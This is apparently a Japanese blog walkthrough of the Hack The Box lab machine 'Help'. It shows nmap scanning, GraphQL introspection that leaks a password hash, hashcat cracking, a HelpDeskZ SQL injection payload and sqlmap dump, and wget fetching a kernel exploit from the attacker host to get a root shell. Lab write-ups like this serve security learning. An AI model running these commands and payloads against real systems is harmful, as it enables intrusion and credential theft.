家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

【Hack The Box】help

目次

 

 

 

偵察/スキャン

nmapでスキャンします。

「nmap -p- 10.10.10.121」の結果よりいくつかのポートが開いていることが確認できます。

上記の結果を踏まえ、開いているポートに対してさらにnmapで調査を行います。

┌──(kali㉿kali)-[~/help]
└─$ sudo nmap -p22,80,3000 -sC -sV -A 10.10.10.121
[sudo] kali のパスワード:
Starting Nmap 7.94SVN ( https://nmap.org ) 
Nmap scan report for 10.10.10.121
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   214.20 ms 10.10.14.1
2   215.11 ms 10.10.10.121

各ポートについて、より詳細に確認していきます。

 

TCP/80の調査

ブラウザでアクセスしましたがページはありませんでした。

ブラウザでのアクセス

dirbでは以下のページが見つかります。

---- Scanning URL: http://help.htb/ ----
+ http://help.htb/index.html (CODE:200|SIZE:11321)                                                                                                                                                           
==> DIRECTORY: http://help.htb/javascript/                                                                                                                                                                   
+ http://help.htb/server-status (CODE:403|SIZE:296)                                                                                                                                                          
==> DIRECTORY: http://help.htb/support/               

 

supportにアクセスすると以下のような画面が表示されます。

/support

認証情報が必要なようです。

TCP/3000の調査

アクセスすると以下のような画面が表示されます。

TCP/3000にアクセスした様子

メッセージより、認証情報が取得できるようです。

このページではGraphQLを使用しており、以下のコマンドでスキーマの情報が取得できます。

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq  -c .
{"data":{"__schema":{"queryType":{"name":"Query","fields":[{"name":"user","description":""}]}}}}
                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}
                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}
                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq  -c .
{"data":{"user":{"username":"helpme@helpme.com","password":"5d3c93182bb20f07b994a7f617e99cff"}}}
                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/help]
└─$ 

最後のコマンドではなぜか「User」では失敗しました。

取得できたpasswordはMD5で暗号化されているようです。

┌──(kali㉿kali)-[~/help]
└─$ hashid 5d3c93182bb20f07b994a7f617e99cff                                     
Analyzing '5d3c93182bb20f07b994a7f617e99cff'
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 

hashcatで解読します。

┌──(kali㉿kali)-[~/help]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt                 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 3 3100 4-Core Processor, 3920/7904 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz             
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 5d3c93182bb20f07b994a7f617e99cff
Time.Started.....: Thu Jul 25 21:02:20 2024 (11 secs)
Time.Estimated...: Thu Jul 25 21:02:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   780.4 kH/s (0.23ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7839744/14344385 (54.65%)
Rejected.........: 0/7839744 (0.00%)
Restore.Point....: 7837696/14344385 (54.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: godilu1 -> gocubs2512
Hardware.Mon.#1..: Util: 56%

 

アクセス取得

/supportに戻って認証情報を入力するとログインできました。

ログイン後の画面

HelpDeskZは、オープンソースのヘルプデスクシステムで、SQLインジェクションの脆弱性があります。

バージョン情報

 

Exploitの検索結果

 

ログインして添付ファイル付きのチケットを作成します。

ticketの作成

作成したチケットの添付ファイルリンクは以下のようなもので、SQLiの脆弱性は最後のパラメータにあります。

http://10.10.10.121/support/?v=view_tickets&action=ticket¶m=4&param=attachment&param=1&param=6

アクセスするURLの末尾に「%20and%201=1--%20-」を追加することで脆弱性を確認できます。「1=1」の場合はファイルのダウンロードができ、「1=2」のようにするとエラー画面が表示されます。

SQLiの検証①

 

 

SQLiの検証②

sqlmapでアカウント情報を調査します。
Brupからリクエストをファイルにコピーします。

 

テーブル情報を出力します。

┌──(kali㉿kali)-[~/htb/help]
└─$ sqlmap -r request -p param[] --tables 
        ___
       __H__                                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.8.6.3#dev}                                                                                                                                                                       
|_ -| . [(]     | .'| . |                                                                                                                                                                                     
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[23:00:24] [INFO] parsing HTTP request from 'request'
[23:00:24] [INFO] resuming back-end DBMS 'mysql' 
[23:00:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: param[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 AND 2767=2767

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 AND (SELECT 9605 FROM (SELECT(SLEEP(5)))oNEB)
~中略~
Database: support
[19 tables]
+------------------------------------------------------+
| articles                                             |
| attachments                                          |
| canned_response                                      |
| custom_fields                                        |
| departments                                          |
| emails                                               |
| error_log                                            |
| file_types                                           |
| knowledgebase_category                               |
| login_attempt                                        |
| login_log                                            |
| news                                                 |
| pages                                                |
| priority                                             |
| settings                                             |
| staff                                                |
| tickets                                              |
| tickets_messages                                     |
| users                                                |
+------------------------------------------------------+

次に「staff」のテーブルの中身を出力します。

┌──(kali㉿kali)-[~/htb/help]
└─$ sqlmap -r request -p param[] -D support -T staff --dump                   
        ___
       __H__                                                                                                                                                                                                  
 ___ ___[(]_____ ___ ___  {1.8.6.3#dev}                                                                                                                                                                       
|_ -| . [']     | .'| . |                                                                                                                                                                                     
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

~中略~

[20:35:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:36:03] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[20:36:03] [INFO] starting 4 processes 
[20:36:05] [INFO] cracked password 'Welcome1' for user 'admin'                                                                                                                                               
Database: support                                                                                                                                                                                            
Table: staff
[1 entry]
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| id | email              | login      | avatar | admin   | status   | fullname      | password                                            | timezone | username | signature                      | department         | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| 1  | support@mysite.com | 1547216217 | NULL   | 1       | Enable   | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) |   | admin    | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0                      |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+

[20:36:16] [INFO] table 'support.staff' dumped to CSV file '/home/kali/.local/share/sqlmap/output/help.htb/dump/support/staff.csv'
[20:36:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

上記でパスワード情報が取得できました。この情報sshにアクセスするとログインができました。

アクセス取得

 

権限昇格

Ubuntuのカーネルバージョンで検索すると以下のエクスプロイトが見つかります。

カーネルバージョン

www.exploit-db.com

 

helpからKaliにある上記のエクスプロイトを取得し実行するとrootが取得できました。

help@help:~$ wget http://10.10.14.3/44298.c
--2024-07-29 05:42:37--  http://10.10.14.3/44298.c
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5773 (5.6K) [text/x-csrc]
Saving to: ‘44298.c’

44298.c                                             100%[=================================================================================================================>]   5.64K  8.35KB/s    in 0.7s    

2024-07-29 05:42:38 (8.35 KB/s) - ‘44298.c’ saved [5773/5773]

help@help:~$ gcc -o a 44298.c
help@help:~$ ./a
task_struct = ffff88003b953800
uidptr = ffff88003712b544
spawning root shell
root@help:~#